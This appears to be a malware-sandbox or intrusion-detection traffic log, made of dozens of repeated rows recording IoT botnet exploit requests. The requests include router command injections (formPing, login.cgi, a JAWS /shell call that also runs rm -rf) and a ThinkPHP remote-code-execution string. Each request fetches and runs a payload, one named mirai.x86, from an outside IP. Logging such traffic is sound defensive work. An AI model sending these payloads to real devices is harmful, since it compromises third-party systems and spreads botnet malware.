| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
| Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
